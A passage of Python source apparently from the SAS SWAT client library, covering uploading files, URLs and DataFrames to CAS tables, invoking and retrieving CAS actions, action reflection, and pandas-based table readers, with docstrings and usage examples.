df_dtypes = self._extract_dtypes(data)
importoptions['locale'] = 'EN-us'
elif data.startswith('http://') or \
data.startswith('https://') or \
data.startswith('ftp://'):
import certifi
import ssl
import tempfile
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urlparse
parts = urlparse(data)
ext = os.path.splitext(parts.path)[-1].lower()
with tempfile.NamedTemporaryFile(delete=False, suffix=ext) as tmp:
delete = True
tmp.write(
urlopen(
data,
context=ssl.create_default_context(cafile=certifi.where())
).read())
filename = tmp.name
if parts.path:
name = os.path.splitext(parts.path.split('/')[-1])[0]
else:
name = os.path.splitext(os.path.basename(filename))[0]
else:
filename = data
name = os.path.splitext(os.path.basename(filename))[0]
# TODO: Populate docstring with table.loadtable action help
filetype = {
'sav': 'spss',
'xlsx': 'excel',
'sashdat': 'hdat',
'sas7bdat': 'basesas',
}
if isinstance(importoptions, (dict, ParamManager)) and \
'filetype' not in [x.lower() for x in importoptions.keys()]:
ext = os.path.splitext(filename)[-1][1:].lower()
if ext in filetype:
importoptions['filetype'] = filetype[ext]
elif len(ext) == 3 and ext.endswith('sv'):
importoptions['filetype'] = 'csv'
kwargs['importoptions'] = importoptions
if df_dtypes:
self._apply_importoptions_vars(importoptions, df_dtypes)
if casout is None:
casout = {}
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
if isinstance(casout, dict) and 'name' not in casout:
casout['name'] = name
kwargs['casout'] = casout
if isinstance(self._sw_connection, rest.REST_CASConnection):
resp = self._sw_connection.upload(a2n(filename), kwargs)
else:
resp = errorcheck(self._sw_connection.upload(a2n(filename),
py2cas(self._soptions,
self._sw_error,
**kwargs)),
self._sw_connection)
# Remove temporary file as needed
if delete:
try:
os.remove(filename)
except Exception:
pass
return self._get_results([(CASResponse(resp, connection=self), self)])
def upload_file(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : string
Either a filename or URL.
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def upload_frame(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : :class:`pandas.DataFrame`
DataFrames will be converted to CSV before uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def _raw_invoke(self, _name_, **kwargs):
''' Invoke a CAS action without any parameter checking '''
self._invoke_without_signature(a2n(_name_), **kwargs)
return self
def _raw_retrieve(self, _name_, **kwargs):
''' Call a CAS action without parameter checking and return results '''
try:
# Call the action and compile the results
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
except SWATCASActionRetry:
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
def invoke(self, _name_, **kwargs):
'''
Call an action on the server
The :meth:`invoke` method only calls the action on the server. It
does not retrieve the responses. To get the responses, you iterate
over the connection object.
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
`self`
See Also
--------
:meth:`retrieve` : Calls action and retrieves results
:meth:`__iter__` : Iterates over responses
Examples
--------
The code below demonstrates how you invoke an action on the server and
iterate through the results.
>>> s.invoke('help')
<swat.CAS object at 0x7fab0a9031d0>
>>> for response in s:
... for key, value in response:
... print(key)
... print(value)
builtins
name description
0 addnode Add a node to the server
1 help Lists the available actions
.
.
.
'''
self._invoke_with_signature(a2n(_name_), **kwargs)
return self
def retrieve(self, _name_, **kwargs):
'''
Call the action and aggregate the results
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
:class:`CASResults` object
See Also
--------
:meth:`invoke` : Calls action, but does not retrieve results
Examples
--------
The code below demonstrates how you invoke an action on the server and
retrieve the results.
>>> out = s.retrieve('help')
>>> print(out.keys())
['builtins', 'casidx', 'casmeta', 'espact', 'tkacon', 'table', 'tkcsessn',
'tkcstate']
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
Status and performance information is also available on the returned object.
Here is an example of an action call to an action that doesn't exist.
>>> out = s.retrieve('foo')
>>> print(out.status)
'The specified action was not found.'
>>> print(out.severity)
2
>>> print(out.messages)
["ERROR: Action 'foo' was not found.",
'ERROR: The CAS server stopped processing this action because of errors.']
Here is an example that demonstrates the performance metrics that are available.
>>> out = s.retrieve('help')
>>> print(out.performance)
<swat.CASPerformance object at 0x33b1c50>
Performance values are loaded lazily, but you can get a dictionary of
all of them using the ``to_dict`` method.
>>> print(out.performance.to_dict())
{'system_cores': 1152L, 'memory_quota': 303759360L, 'cpu_user_time': 0.014995,
'elapsed_time': 0.004200000000000001, 'system_nodes': 48L,
'memory_system': 432093312L, 'cpu_system_time': 0.018999, 'memory': 150688L,
'memory_os': 294322176L, 'system_total_memory': 4868538236928L}
Rather than having the ``retrieve`` method compile all of the results into one
object, you can control how the responses and results from the server are
handled in your own functions using the ``responsefunc`` or ``resultfunc`` keyword
arguments.
The ``responsefunc`` argument allows you to specify a function that is called for
each response from the server after the action is called. The ``resultfunc``
is called for each result in a response. These functions can not be used at the
same time though. In the case where both are specified, only the resultfunc
will be used. Below is an example of using a responsefunc function.
This function closely mimics what the `retrieve` method does by default.
>>> def myfunc(response, connection, userdata):
... if userdata is None:
... userdata = {}
... for key, value in response:
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', responsefunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
The same result can be gotten using the ``resultfunc`` option as well.
>>> def myfunc(key, value, response, connection, userdata):
... if userdata is None:
... userdata = {}
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', resultfunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
'''
kwargs = dict(kwargs)
# Decode from JSON as needed
if '_json' in kwargs:
newargs = json.loads(kwargs['_json'])
newargs.update(kwargs)
del newargs['_json']
kwargs = newargs
datamsghandler = None
if 'datamsghandler' in kwargs:
datamsghandler = kwargs['datamsghandler']
kwargs.pop('datamsghandler')
if self._protocol.startswith('http'):
raise SWATError('Data message handlers are not supported '
'in the REST interface.')
# Response callback function
responsefunc = None
if 'responsefunc' in kwargs:
responsefunc = kwargs['responsefunc']
kwargs.pop('responsefunc')
# Result callback function
resultfunc = None
if 'resultfunc' in kwargs:
resultfunc = kwargs['resultfunc']
kwargs.pop('resultfunc')
try:
# Call the action and compile the results
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
except SWATCASActionRetry:
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
# Return raw data if a function was supplied
if responsefunc is not None or resultfunc is not None:
return results
results.signature = signature
# run post-processing hooks
if signature and signature.get('name') in self._results_hooks:
for func in self._results_hooks[signature['name']]:
func(self, results)
return results
def _get_results(self, riter, responsefunc=None, resultfunc=None):
'''
Walk through responses in ``riter`` and compile results
Parameters
----------
riter : iterable
Typically a CAS object, but any iterable that returns a
response / connection pair for each iteration can be used.
responsefunc : callable, optional
Callback function that is called for each response
resultfunc : callable, optional
Callback function that is called for each result
Returns
-------
CASResults
If no callback functions were supplied.
any
If a callback function is supplied, the result of that function
is returned.
'''
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
resultdata = None
responsedata = None
try:
for response, conn in riter:
if response.disposition.status_code == RETRY_ACTION_CODE:
raise SWATCASActionRetry(response.disposition.status)
elif response.disposition.status_code == SESSION_ABORTED_CODE:
# Any new requests sent to the session will never return,
# so just close the connection now.
self.close()
raise SWATCASActionError(response.disposition.status, response, conn)
if responsefunc is not None:
responsedata = responsefunc(response, conn, responsedata)
continue
# Action was restarted by the server
if 'action-restart' in response.updateflags:
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
continue
# CASTable parameters
caslib = None
tablename = None
castable = None
for key, value in response:
if resultfunc is not None:
resultdata = resultfunc(key, value, response,
conn, resultdata)
continue
if key is None or isinstance(key, int_types):
results[idx] = value
idx += 1
else:
lowerkey = key.lower()
if lowerkey == 'tablename':
tablename = value
elif lowerkey == 'caslib':
caslib = value
elif lowerkey == 'castable':
castable = True
# Event results start with '$'
if key.startswith('$'):
events[key] = value
else:
results[key] = value
# Create a CASTable instance if all of the pieces are there
if caslib and tablename and not castable:
results['casTable'] = self.CASTable(tablename, caslib=caslib)
results.performance = response.performance
for key, value in six.iteritems(response.disposition.to_dict()):
setattr(results, key, value)
messages.extend(response.messages)
updateflags.update(response.updateflags)
except SWATCASActionError as err:
if responsefunc:
err.results = responsedata
elif resultfunc:
err.results = resultdata
else:
err.results = results
err.events = events
raise err
if responsefunc is not None:
return responsedata
if resultfunc is not None:
return resultdata
return results
def __getattr__(self, name, atype=None):
'''
Convenience method for getting a CASActionSet/CASAction as an attribute
When an attribute that looks like an action name is accessed, CAS
is queried to see if it is an action set or action name. If so,
the reflection information for the entire actionset is used to
generate classes for the actionset and all actions.
Parameters
----------
name : string
Action name or action set name
atype : string, optional
Type of item to search for exclusively ('actionset', 'action',
or 'action_class')
Returns
-------
CASAction
If `name` is an action name
CASActionSet
If `name` is an action set name
Raises
------
AttributeError
if `name` is neither an action name or action set name
'''
class_requested = False
origname = name
# Normalize name
if re.match(r'^[A-Z]', name):
class_requested = True
if atype is not None and atype == 'action_class':
class_requested = True
atype = 'action'
name = name.lower()
# Check cache for actionset and action classes
if (atype in [None, 'actionset'] and name in self._actionset_classes
and self._actionset_classes[name] is not None):
return self._actionset_classes[name]()
if (atype in [None, 'action'] and name in self._action_classes
and self._action_classes[name] is not None):
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# See if the action/action set exists
asname, actname, asinfo = self._get_actionset_info(name.lower(), atype=atype)
# Generate a new actionset class
ascls = CASActionSet.from_reflection(asinfo, self)
# Add actionset and actions to the cache
self._actionset_classes[asname.lower()] = ascls
for key, value in six.iteritems(ascls.actions):
self._action_classes[key] = value
self._action_classes[asname.lower() + '.' + key] = value
# Check cache for actionset and action classes
if atype in [None, 'actionset'] and name in self._actionset_classes:
return self._actionset_classes[name]()
if atype in [None, 'action'] and name in self._action_classes:
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# Look for actions that can't be reflected
if asname and actname:
enabled = ['yes', 'y', 'on', 't', 'true', '1']
if os.environ.get('CAS_ACTION_TEST_MODE', '').lower() in enabled:
if asname not in self._actionset_classes:
self._actionset_classes[asname.lower()] = ascls
else:
ascls = self._actionset_classes[asname.lower()]
if actname not in ascls.actions:
ascls.actions[actname.lower()] = None
return getattr(ascls(), actname)
raise AttributeError(origname)
def _get_action_info(self, name, showhidden=True, levels=None):
'''
Get the reflection information for the given action name
Parameters
----------
name : string
Name of the action
showhidden : boolean
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-info-dict
'''
name = name.lower()
if name in self._action_info:
return self._action_info[name]
asname, actname, asinfo = self._get_reflection_info(name,
showhidden=showhidden,
levels=levels)
# If action name is None, it is the same as the action set name
if actname is None:
actname = asname
# Populate action set info while we're here
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info
actinfo = {}
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
if aname == actname.lower():
actinfo = item
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, actinfo
def _get_actionset_info(self, name, atype=None, showhidden=True, levels=None):
'''
Get the reflection information for the given action set / action name
If the name is an action set, the returned action name will be None.
Parameters
----------
name : string
Name of the action set or action
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-set-info-dict
'''
name = name.lower()
if atype in [None, 'actionset'] and name in self._actionset_info:
return self._actionset_info[name]
if atype in [None, 'action'] and name in self._action_info:
asname, aname, actinfo = self._action_info[name]
return asname, aname, self._actionset_info[asname.lower()][-1]
asname, actname, asinfo = self._get_reflection_info(name, atype=atype,
showhidden=showhidden,
levels=levels)
# Populate action set info
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info while we're here
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, asinfo
def _get_reflection_info(self, name, atype=None, showhidden=True, levels=None):
'''
Get the full action name of the called action including the action set information
Parameters
----------
name : string
Name of the argument
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
levels : int, optional
Number of levels of reflection data to return. Default is all.
Returns
-------
tuple
( action set name, action name, action set reflection info )
'''
asname = None
actname = None
# See if the name is an action set name, action name, or nothing
if atype in [None, 'actionset']:
for response in self._invoke_without_signature('builtins.queryactionset',
actionset=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if value:
asname = name.lower()
break
if asname is None:
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.queryname',
name=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
asname = out.get('actionSet')
actname = out.get('action')
# We can't have both in the same namespace, action set name wins
if asname == actname:
actname = None
# If we have an action set name, reflect it
if asname:
asname = asname.lower()
query = {'showhidden': showhidden, 'actionset': asname}
if not get_option('interactive_mode'):
query['showlabels'] = False
if 'reflection-levels' in self.server_features:
if levels is not None:
query['levels'] = levels
else:
query['levels'] = get_option('cas.reflection_levels')
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.reflect',
_messagelevel='error',
_apptag='UI', **query):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
# Normalize the output
asinfo = _lower_actionset_keys(out[0])
for act in asinfo.get('actions'):
act['name'] = (asname + '.' + act['name']).lower()
return asname, actname, asinfo
raise AttributeError(name)
def __iter__(self):
'''
Iterate over responses from CAS
If you used the :meth:`invoke` method to call a CAS action, the
responses from the server are not automatically retrieved. You
will need to pull them down manually. Iterating over the CAS
connection object after calling :meth:`invoke` will pull responses
down until they have been exhausted.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> for resp in conn:
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`invoke` : Calls a CAS action without retrieving results
:meth:`retrieve` : Calls a CAS action and retrieves results
Yields
------
:class:`CASResponse` object
'''
for response, conn in getnext(self, timeout=0):
if conn is not None:
yield response
#
# Top-level Pandas functions
#
def _get_table_args(self, **kwargs):
''' Extract table paramaters from function arguments '''
out = {}
kwargs = kwargs.copy()
casout = kwargs.pop('casout', {})
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
elif not isinstance(casout, dict):
casout = dict(name=casout)
out['table'] = casout.get('name', None)
out['caslib'] = casout.get('caslib', None)
out['replace'] = casout.get('replace', None)
out['label'] = casout.get('label', None)
out['promote'] = casout.get('promote', None)
if not out['table']:
out.pop('table')
if not out['caslib']:
out.pop('caslib')
if out['replace'] is None:
out.pop('replace')
if out['label'] is None:
out.pop('label')
if out['promote'] is None:
out.pop('promote')
return out, kwargs
def load_path(self, path=None, readahead=None, importoptions=None,
promote=None, ondemand=None, attrtable=None,
caslib=None, datasourceoptions=None, casout=None, singlepass=None,
where=None, vars=None, groupby=None, groupbyfmts=None,
groupbymode=None, orderby=None, nosource=None, returnwhereinfo=None,
**kwargs):
'''
Load a path from a CASLib
The parameters for this are the same as for the ``builtins.loadtable``
CAS action. This method is simply a convenience method that loads a
table and returns a :class:`CASTable` in one step.
Notes
-----
The path specified must exist on the **server side**. For loading
data from the client side, see the ``read_*`` and :meth:`upload` methods.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.load_path('data/iris.csv')
>>> print(tbl.head())
See Also
--------
:meth:`read_csv`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
args = {k: v for k, v in dict(path=path, readahead=readahead,
importoptions=importoptions, promote=promote,
ondemand=ondemand, attrtable=attrtable, caslib=caslib,
datasourceoptions=datasourceoptions, casout=casout,
singlepass=singlepass, where=where, vars=vars, groupby=groupby,
groupbyfmts=groupbyfmts, groupbymode=groupbymode,
orderby=orderby, nosource=nosource,
returnwhereinfo=returnwhereinfo).items() if v is not None}
args.update(kwargs)
out = self.retrieve('table.loadtable', _messagelevel='error', **args)
try:
return out['casTable']
except KeyError:
raise SWATError(out.status)
def _importoptions_from_dframe(self, dframe):
'''
Derive importoptions= values from DataFrame
'''
use_options = False
ivars = []
importoptions = dict(filetype='csv', vars=ivars)
for i, dtype in enumerate(dframe.dtypes.values):
dtype = str(dtype)
if 'int64' in dtype:
ivars.append(dict(type='int64'))
use_options = True
elif 'int32' in dtype:
ivars.append(dict(type='int32'))
use_options = True
else:
ivars.append({})
if use_options:
return importoptions
def _read_any(self, _method_, *args, **kwargs):
'''
Generic data file reader
Parameters
----------
_method_ : string
The name of the pandas data reader function.
*args : one or more arguments
Arguments to pass to the data reader.
**kwargs : keyword arguments
Keyword arguments to pass to the data reader function.
The keyword parameters 'table', 'caslib', 'promote', and
'replace' will be stripped to use for the output CAS
table parameters.
Returns
-------
:class:`CASTable`
'''
import pandas as pd
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(**kwargs)
dframe = getattr(pd, _method_)(*args, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_pickle(self, path, casout=None, **kwargs):
'''
Load pickled pandas object from the specified path
This method calls :func:`pandas.read_pickle` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path : string
Path to a local pickle file.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_pickle`.
Notes
-----
Paths to specified files point to files on the **client machine**.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_pickle('dataframe.pkl')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_pickle`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_pickle', path, casout=casout, **kwargs)
def read_table(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read general delimited file into a CAS table
This method calls :func:`pandas.read_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.tsv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_table(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.Text(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_csv(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read CSV file into a CAS table
This method calls :func:`pandas.read_csv` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_csv`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_csv('iris.csv')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_csv(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.CSV(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_frame(self, dframe, casout=None, **kwargs):
'''
Convert DataFrame to CAS table
Parameters
----------
dframe : DataFrame
The DataFrame to read into CAS
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
Notes
-----
When `use_addtable=False` (the default) is specified, this method
is equivalent to `upload_frame`. If `use_addtable=True` is specified,
the `table.addtable` CAS action is used and the DataFrame does not
need to be written to disk first. However, this mode can only be used
with the binary (not REST) protocol.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_frame(pd.DataFrame(np.random.randn(100, 4),
... columns='ABCD'))
>>> print(tbl.head())
See Also
--------
:meth:`upload_frame`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.PandasDataFrame(dframe, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_fwf(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read a table of fixed-width formatted lines into a CAS table
This method calls :func:`pandas.read_fwf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : str or any object with a read() method
Path, URL, or buffer to read.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Notes
-----
Paths to specified files point to files on the client machine.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_table('iris.dat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_table`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
use_addtable = kwargs.pop('use_addtable', False)
table, kwargs = self._get_table_args(casout=casout, **kwargs)
# REST doesn't support table.addtable
if not use_addtable or self._protocol.startswith('http'):
import pandas as pd
dframe = pd.read_fwf(filepath_or_buffer, **kwargs)
if 'table' in table:
table['name'] = table.pop('table')
return self.upload_frame(dframe, casout=table and table or None)
# importoptions=self._importoptions_from_dframe(dframe)
from swat import datamsghandlers as dmh
table.update(dmh.FWF(filepath_or_buffer, **kwargs).args.addtable)
return self.retrieve('table.addtable', **table).casTable
def read_clipboard(self, casout=None, **kwargs):
'''
Read text from clipboard and pass to :meth:`read_table`
Parameters
----------
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
See Also
--------
:func:`pandas.read_clipboard`
:func:`pandas.read_table`
:meth:`read_table`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_clipboard', casout=casout, **kwargs)
def read_excel(self, io, casout=None, **kwargs):
'''
Read an Excel table into a CAS table
This method calls :func:`pandas.read_excel` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or path object
File-like object, URL, or pandas ExcelFile.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_excel('iris.xlsx')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_excel`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_excel', io, casout=casout, **kwargs)
def read_json(self, path_or_buf=None, casout=None, **kwargs):
'''
Read a JSON string into a CAS table
This method calls :func:`pandas.read_json` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the JSON data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_json('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_json`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_json', path_or_buf, casout=casout, **kwargs)
def json_normalize(self, data, casout=None, **kwargs):
'''
"Normalize" semi-structured JSON data into a flat table and upload to a CAS table
This method calls :func:`pandas.json_normalize` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
data : dict or list of dicts
Unserialized JSON objects
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.json_normalize`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.json_normalize('iris.json')
>>> print(tbl.head())
See Also
--------
:func:`pandas.json_normalize`
Returns
-------
:class:`CASTable`
'''
return self._read_any('json_normalize', data, casout=casout, **kwargs)
def read_html(self, io, casout=None, **kwargs):
'''
Read HTML tables into a list of CASTable objects
This method calls :func:`pandas.read_html` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
io : string or file-like object
The path, URL, or file object that contains the HTML data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
